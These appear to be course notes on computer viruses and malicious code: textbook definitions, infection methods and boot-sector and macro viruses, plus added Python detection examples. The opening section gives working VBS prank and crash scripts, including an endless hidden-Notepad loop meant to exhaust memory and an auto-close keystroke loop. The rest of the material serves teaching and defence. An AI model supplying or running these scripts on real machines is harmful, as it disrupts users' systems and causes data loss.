
Viruses

virus:
1) Open Notepad, type the following and save it as fakemsg.vbs

do

msgbox "System Error : 423"

loop

• This script displays a message box with the message "System Error : 423".

• The message box reappears each time it is closed.

To run the VBS script:

• Go to Start -> Run and type the full path including the script name.


To stop the script:

• To stop a script running under WScript, end its process in Windows Task Manager.
• Open Task Manager (right-click the taskbar and select Task Manager, or type taskmgr in the Run dialog box).

• On the Processes tab, select wscript.exe and press End Process.


2) Crash System: Open Notepad, type the following and save it as crashsystem.vbs

set ws=CreateObject("wscript.shell")

do

ws.run "notepad",0
loop

• This program opens Notepad in hidden mode in an endless loop, overloading system memory until the system crashes.

• The value "0" in the third line specifies the mode in which the application runs; here it is hidden mode.

3) Close applications automatically within 5 seconds

Open Notepad, type the following and save it as autoclose.vbs

set ws=CreateObject("wscript.shell")

do

ws.sendkeys "%{F4}"

wscript.sleep 5000

loop

• This script automatically closes any open application within 5 seconds.

• To use a larger time value, change the line "wscript.sleep 5000".

• To close applications within 15 seconds, change the value from “5000” to “15000”.

4) Disable The Mouse

Open Notepad, type the following and save it as disablemouse.vbs

set ws=Createobject("wscript.shell")

for i=1 to 4

ws.run "WISPTIS.EXE",0

next

• This script temporarily disables the mouse functionality.
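From the defender's side, the loop in script 2 stands out in process-creation logs as one script host starting many children in a short time. The following is an added example, not part of the original notes: it runs a sliding-window check over constructed process-creation records, and the field names, threshold and window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # Windows Script Host binaries

def find_spawn_bursts(events, threshold=20, window=timedelta(seconds=10)):
    """Flag script-host processes that start `threshold` or more children
    inside a sliding `window`. Field names are assumptions for this example."""
    recent = defaultdict(deque)      # parent_pid -> start times still in window
    alerts = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["parent_image"].lower() not in SCRIPT_HOSTS:
            continue
        times = recent[ev["parent_pid"]]
        times.append(ev["time"])
        while ev["time"] - times[0] > window:   # drop starts older than window
            times.popleft()
        if len(times) >= threshold and ev["parent_pid"] not in alerts:
            alerts[ev["parent_pid"]] = {
                "parent_pid": ev["parent_pid"],
                "parent_image": ev["parent_image"],
                "child_image": ev["image"],
                "first_seen": times[0],
                "detected_at": ev["time"],
            }
    return list(alerts.values())

def sample_events():
    """Constructed process-creation records, not taken from a real host."""
    t0 = datetime(2024, 1, 1, 9, 0, 0)
    events = [  # a user opening two programs from the shell
        {"time": t0, "parent_pid": 900, "parent_image": "explorer.exe", "image": "notepad.exe"},
        {"time": t0 + timedelta(seconds=5), "parent_pid": 900,
         "parent_image": "explorer.exe", "image": "calc.exe"},
    ]
    # a logon script that starts three helpers, one every 30 seconds
    events += [{"time": t0 + timedelta(seconds=30 * i), "parent_pid": 5000,
                "parent_image": "wscript.exe", "image": "cmd.exe"} for i in range(3)]
    # the loop from script 2: one hidden notepad every 100 ms
    events += [{"time": t0 + timedelta(milliseconds=100 * i), "parent_pid": 4120,
                "parent_image": "WScript.exe", "image": "notepad.exe"} for i in range(40)]
    return events

if __name__ == "__main__":
    for alert in find_spawn_bursts(sample_events()):
        print(alert)
```

Only the looping script host is reported; the slow logon script and the interactive shell stay below the threshold.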

Why worry about Malicious code?


• Malicious code behaves in unexpected ways.
• Malicious code can write a message on the computer screen, stop a running program, generate a sound or erase a stored file.

• Malicious code can also do nothing at all: once planted, it can lie dormant and undetected until some event triggers the code to act. The trigger can be a time or date, an event, a condition, a count or a combination of these.

Kinds of malicious code:


• Malicious code, or a rogue program, is the general name for unanticipated or undesired effects in programs or program parts, caused by an agent intent on damage.

• The agent is the writer of the program or the person who causes its distribution.

Virus:
• A virus is a program that can replicate itself and pass on malicious code to other nonmalicious programs by modifying them.

Transient virus: has a life that depends on the life of its host; the virus runs when its attached program executes and terminates when its attached program ends.

Resident virus: locates itself in memory; then it can remain active or be activated as a stand-alone program, even after its attached program ends.

Trojan horse:
• Gets installed automatically along with an infected legitimate program.

• Once installed on the target machine, it can perform various malicious operations such as deleting files, transmitting files to the intruder, modifying files, installing other programs that provide unauthorized access, and executing privilege elevation attacks.

Malicious codes:
• Logic bomb: a class of malicious code that runs when a specified condition occurs.

• Time bomb: a logic bomb whose trigger is a time or date.

• Trapdoor or backdoor: a feature through which someone can access the program with special privileges. For example, the number 990099 in an automated bank teller program might allow someone to process the log of everyone's transactions at the machine.

• A worm is a program that spreads copies of itself through a network.

• A rabbit is a virus or worm that self-replicates without bound. It tries to exhaust resources. For example, a rabbit might create copies of itself and store them on the disk to completely fill the disk.

Difference between virus and worm:


• A worm operates through networks, whereas a virus can spread through any medium.

• A worm spreads copies of itself as a stand-alone program; a virus spreads copies of itself as a program that attaches to or embeds in other programs.

How viruses attach:


• A virus may be on a CD; when it is executed, the virus copies itself to permanent storage.

• A virus may be attached to an e-mail. The virus writer convinces the victim to open the attachment.

1) Appended viruses:

A virus program attaches itself to a program; whenever the program is run, the virus is activated.

2) Viruses that surround a program:

The virus is attached to the original program but has control both before and after its execution.

The virus writer wants to prevent the virus from being detected.

If the virus is stored on disk, the filename or its size may help in detection.
The virus writer therefore attaches the virus to the program that constructs the listing of files on disk.
If the virus regains control after the listing program has generated the list but before the listing is displayed or printed, the virus could eliminate its own entry from the listing.

3) Integrated viruses and replacements

The virus replaces some of the target and integrates itself into the original code of the target.

Document viruses:
• Implemented within a formatted document, such as a written document, a database, a slide presentation, a picture or a spreadsheet.

• These documents are highly structured files that contain both data and commands (included in macros, variables, procedures, file accesses and system calls).

• The virus writer can use any feature of the document to perform malicious actions.

How viruses gain control:


• The virus (V) is to be invoked instead of the target (T).

Homes for viruses:

The virus writer may find these qualities appealing in a virus:

• It is hard to detect.

• It is not easily destroyed or deactivated.

• It spreads infection widely.

• It can reinfect its home program or other programs.

• It is easy to create.

• It is machine independent and operating system independent.

How viruses gain control:


• Many viruses are transmitted by e-mail, using either of two routes.

• In the first case, some virus writers generate a new e-mail message to all addresses in the victim's address book. These new messages contain a copy of the virus so that it propagates widely.

• The new recipient opens the attachment from a friend. For example, the subject line or message body may read "I thought you might enjoy this picture from our vacation."

• In the second case, the virus writer can leave the infected file for the victim to forward unknowingly. If the virus's effect is not immediately obvious, the victim may pass the infected file unwittingly to other victims.

Viral residence - One-Time Execution:


• The majority of viruses today execute only once, spreading their infection and causing their effect in that one execution.

• A virus often arrives as an e-mail attachment of a document virus. It is executed just by being opened.

Viral residence - Boot Sector Viruses:


• When a computer starts, control begins with firmware that determines which hardware
components are present, tests them, and transfers control to an operating system.

• The operating system is invoked dynamically, perhaps even by a user's choice, after the hardware test.

• The operating system is software stored on disk. The bootstrap (often just "boot") loader copies the operating system from disk to memory and transfers control to it; the name is used because the operating system figuratively pulls itself into memory by its bootstraps.

• The firmware does its control transfer by reading a fixed number of bytes from a fixed
location on the disk called the boot sector to a fixed address in memory and then
jumping to that address (which will turn out to contain the first instruction of the
bootstrap loader).

• The bootstrap loader then reads into memory the rest of the operating system from
disk.
• To run a different operating system, the user just inserts a disk with the new operating
system and a bootstrap loader.

• When the user reboots from this new disk, the loader there brings in and runs another
operating system. This same scheme is used for personal computers, workstations, and
large mainframes.

• The virus gains control very early in the boot process, before most detection tools are active.

• The virus can avoid, or at least complicate, detection.

• The files in the boot area are crucial parts of the operating system. To keep users from
accidentally modifying or deleting them with disastrous results, the operating system
makes them "invisible" by not showing them as part of a normal listing of stored files,
preventing their deletion.

• The virus code is not readily noticed by users.
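Because the firmware always loads the same fixed-size sector, a defender can record that sector while the machine is known to be clean and compare it later. The following is an added example, not part of the original notes: it assumes the classic 512-byte MBR layout (446 bytes of code, four 16-byte partition entries, the 0x55AA signature) and uses a constructed sector with placeholder bytes in place of real boot code.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446       # classic MBR: 446 bytes of code, 4 x 16-byte partition entries
SIGNATURE = b"\x55\xaa"   # final two bytes of a valid boot sector

def parse_boot_sector(sector):
    """Split an MBR-style boot sector into the parts worth monitoring."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("boot sector must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        start = BOOT_CODE_LEN + 16 * i
        status, ptype, lba, count = struct.unpack("<B3xB3xII", sector[start:start + 16])
        if ptype:  # type 0 marks an unused slot
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba, "sectors": count})
    return {
        "signature_ok": sector[-2:] == SIGNATURE,
        "code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }

def check_boot_sector(sector, baseline):
    """Compare a freshly read sector with a baseline taken from a known-clean state."""
    current = parse_boot_sector(sector)
    findings = []
    if not current["signature_ok"]:
        findings.append("missing 0x55AA signature")
    if current["code_sha256"] != baseline["code_sha256"]:
        findings.append("boot code changed")
    if current["partitions"] != baseline["partitions"]:
        findings.append("partition table changed")
    return findings

def sample_sector(code=b"CLEAN-LOADER"):
    """Constructed sector: placeholder bytes instead of real boot code, one partition."""
    entry = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 204800)
    return code.ljust(BOOT_CODE_LEN, b"\x00") + entry + bytes(48) + SIGNATURE

if __name__ == "__main__":
    baseline = parse_boot_sector(sample_sector())
    print(check_boot_sector(sample_sector(), baseline))                 # unchanged
    print(check_boot_sector(sample_sector(b"OTHER-LOADER"), baseline))  # modified code
```

Since the virus gains control before most detection tools are active, the comparison is most trustworthy when the sector is read after booting from separate, known-clean media and the baseline is stored off the machine.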

Viral residence - Memory-Resident Viruses:


• For very frequently used parts of the operating system and for a few specialized user programs, the code remains in memory and is called "resident" code.

• Examples of resident code are the routine that interprets keys pressed on the keyboard, the code that handles error conditions that arise during a program's execution, or a program that acts like an alarm clock, sounding a signal at a time the user determines.

• Resident routines are sometimes called TSRs or "terminate and stay resident" routines.

• Virus writers also like to attach viruses to resident code because the resident code is activated many times while the machine is running.

• Each time the resident code runs, the virus does too. Once activated, the virus can look for and infect uninfected carriers.

• For example, after activation, a boot sector virus might attach itself to a piece of resident code. Then, each time the virus was activated it might check whether any removable disk in a disk drive was infected and, if not, infect it.

Other Homes for Viruses:


• One popular home for a virus is an application program. Many applications, such as word processors and spreadsheets, have a "macro" feature, by which a user can record a series of commands and repeat them with one invocation. Such programs also provide a "startup macro" that is executed every time the application is executed.

• A virus writer can create a virus macro that adds itself to the startup directives for the application. It also then embeds a copy of itself in data files so that the infection spreads to anyone receiving one or more of those files.

• Because libraries are used by many programs, malicious code residing there will have a broad effect.

• Libraries are also shared among users and transmitted from one user to another, a practice that spreads the infection.

• Finally, executing code in a library can pass on the viral infection to other transmission media.

• Compilers, loaders, linkers, runtime monitors, runtime debuggers, and even virus control programs are good candidates for hosting viruses because they are widely shared.
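The macro paragraphs above describe data files that carry commands. As an added example, not part of the original notes, the check below shows how a mail or file gateway can tell whether an Office Open XML document carries a VBA macro project: such files are ZIP containers, and macros are stored in a part named vbaProject.bin. The sample files are constructed in memory, the verdict strings are this example's own, and older binary formats such as .doc are not covered.

```python
import io
import zipfile

MACRO_FREE_EXT = {".docx", ".xlsx", ".pptx"}  # extensions that should never carry VBA

def inspect_document(name, data):
    """Report whether an Office Open XML file carries a VBA project part."""
    result = {"name": name, "is_ooxml": False, "vba_parts": [],
              "verdict": "not an OOXML container"}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    if "[Content_Types].xml" not in names:   # required part of every OOXML package
        return result
    result["is_ooxml"] = True
    result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if not result["vba_parts"]:
        result["verdict"] = "no macros"
    elif ext in MACRO_FREE_EXT:
        result["verdict"] = "macro part in macro-free extension"
    else:
        result["verdict"] = "macros present"
    return result

def build_sample(parts):
    """Build a constructed OOXML-like package in memory from {part_name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        for part, body in parts.items():
            zf.writestr(part, body)
    return buf.getvalue()

if __name__ == "__main__":
    plain = build_sample({"word/document.xml": b"<document/>"})
    macro = build_sample({"word/document.xml": b"<document/>",
                          "word/vbaProject.bin": b"placeholder, not a real VBA project"})
    for fname, blob in [("report.docx", plain), ("report.docm", macro),
                        ("invoice.docx", macro), ("notes.txt", b"hello")]:
        print(fname, "->", inspect_document(fname, blob)["verdict"])
```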
